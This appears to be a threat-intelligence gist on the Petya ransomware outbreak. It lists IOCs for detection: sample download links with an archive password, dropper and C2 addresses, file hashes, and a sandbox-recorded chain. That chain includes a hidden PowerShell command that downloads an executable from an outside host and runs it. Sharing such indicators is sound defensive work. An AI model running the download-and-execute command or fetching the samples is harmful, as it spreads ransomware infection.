Create a gist now

Instantly share code, notes, and snippets.

What would you like to do?
WannaCry2: Petya Ransomware attack.
Got new info? Email at isox@vulners.com
*********** Possible malware files:
https://yadi.sk/d/S0-ZhPY53KWc84
https://yadi.sk/d/Zpkm88sp3KWc8v
Archive password: virus
*********** Malware dropped file:
http://185.165.29.78/~alex/svchost.exe
*********** Analysis:
https://virustotal.com/fr/file/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745/analysis/
https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100
https://twitter.com/PolarToffee/status/879709615675641856
*********** Hashes by codexgigas team:
For 185.165.29.78, we have:
a809a63bc5e31670ff117d838522dec433f74bee
bec678164cedea578a7aff4589018fa41551c27f
d5bf3f100e7dbcc434d7c58ebf64052329a60fc2
aba7aa41057c8a6b184ba5776c20f7e8fc97c657
0ff07caedad54c9b65e5873ac2d81b3126754aac
51eafbb626103765d3aedfd098b94d0e77de1196
078de2dc59ce59f503c63bd61f1ef8353dc7cf5f
As droppers
And for 84.200.16.242:
7ca37b86f4acc702f108449c391dd2485b5ca18c
2bc182f04b935c7e358ed9c9e6df09ae6af47168
1b83c00143a1bb2bf16b46c01f36d53fb66f82b5
82920a2ad0138a2a8efc744ae5849c6dde6b435d
*********** Potential (IOC)
- - - - - - - - - - - - - - - - - - - - - - - -
File Name Order-20062017.doc (RTF із CVE-2017-0199)
MD5 Hash Identifier 415FE69BF32634CA98FA07633F4118E1
SHA-1 Hash Identifier 101CC1CB56C407D5B9149F2C3B8523350D23BA84
SHA-256 Hash Identifier FE2E5D0543B4C8769E401EC216D78A5A3547DFD426FD47E097DF04A5F7D6D206
File Size 6215 bytes
File Type Rich Text Format data
Connects to the host:
84.200.16.242 80
h11p://84.200.16.242/myguy.xls
File Name myguy.xls
MD5 Hash Identifier 0487382A4DAF8EB9660F1C67E30F8B25
SHA-1 Hash Identifier 736752744122A0B5EE4B95DDAD634DD225DC0F73
SHA-256 Hash Identifier EE29B9C01318A1E23836B949942DB14D4811246FDAE2F41DF9F0DCD922C63BC6
File Size 13893 bytes
File Type Zip archive data
mshta.exe %WINDIR%\System32\mshta.exe" "C:\myguy.xls.hta" " (PID: 2324)
powershell.exe -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('h11p://french-cooking.com/myguy.exe', '%APPDATA%\10807.exe');" (PID: 2588, Additional Context: ( System.Net.WebClient).DownloadFile('h11p://french-cooking.com/myguy.exe', '%APPDATA%\10807.exe') ;)
10807.exe %APPDATA%\10807.exe" " (PID: 3096)
File Name BCA9D6.exe
MD5 Hash Identifier A1D5895F85751DFE67D19CCCB51B051A
SHA-1 Hash Identifier 9288FB8E96D419586FC8C595DD95353D48E8A060
SHA-256 Hash Identifier 17DACEDB6F0379A65160D73C0AE3AA1F03465AE75CB6AE754C7DCB3017AF1FBD
File Size 275968 bytes
Connects to the host:
111.90.139.247 80
COFFEINOFFICE.XYZ 80
Pay attention - the trojan on which I give the markers could potentially be used to load the encryption part.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment